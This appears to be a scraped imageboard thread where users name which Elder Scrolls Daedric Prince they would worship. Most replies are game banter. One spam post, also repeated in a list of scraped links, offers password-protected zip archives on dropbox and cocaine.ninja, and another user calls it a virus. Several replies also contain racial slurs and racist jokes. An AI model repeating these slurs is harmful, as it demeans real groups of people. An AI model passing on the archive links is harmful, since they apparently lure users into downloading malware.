If you lived in the Elder Scrolls universe what Daedric Prince would you worship, if any?

If you lived in the Elder Scrolls universe what Daedric Prince would you worship, if any?

Other urls found in this thread:

dropbox.com/s/am3x4el6x0ly72e/L0.zip?dl=1
a.cocaine.ninja/jdkbzf.zip
twitter.com/AnonBabble

Probably Boethia because she seems easy to please if you don't mind killing your friends

For reasons

Probably Sanguine because he sounds like a right lad to get pissed with

Molag bal my nigger

MOLAG BALLSACK

Meridia because im not an edge lord

Is she even a daedric prince?

Danny Devito

Hermaeus Mora, if I'm thinking smart and hedging my bets. Having all the answers, delving into the study and implications of magic, peering at the forbidden truths of the universe and all that good shit.

Hircine, since in all "actual" probability I'd most likely end up as one of his /an/-lurking doggies: cutting loose and running through the wilds as a savage thing, just enjoying the simple fact of being alive in a world with so much wilderness and diversity.

The hero of Kvatch

I'd worship Mister Dagon

>implying it's even a choice
I choose getting fucked up on some quality cyrodilic brandy and skooma with Sanguine 24/7

yes

3074 Mirrors: Enjoy Sup Forums 1) dropbox.com/s/am3x4el6x0ly72e/L0.zip?dl=1 2) a.cocaine.ninja/jdkbzf.zip Password is included.

Nice virus, bro.

what?

Her or Azura

Officially, yes

>world with so much wilderness and diversity
Goddamn SJW hippies

Worshiping Azura might increase your life expectancy on the shit hole that is Nirn.

Biodiversity =/= muhsafespace diversity

Argonians are niggers.

Underrated post

molag bal, so i could crush my enemies

Probably this.

Benjamin Franklin fucked his niggers.

Meridia. Slaying demons and undead is right up my alley.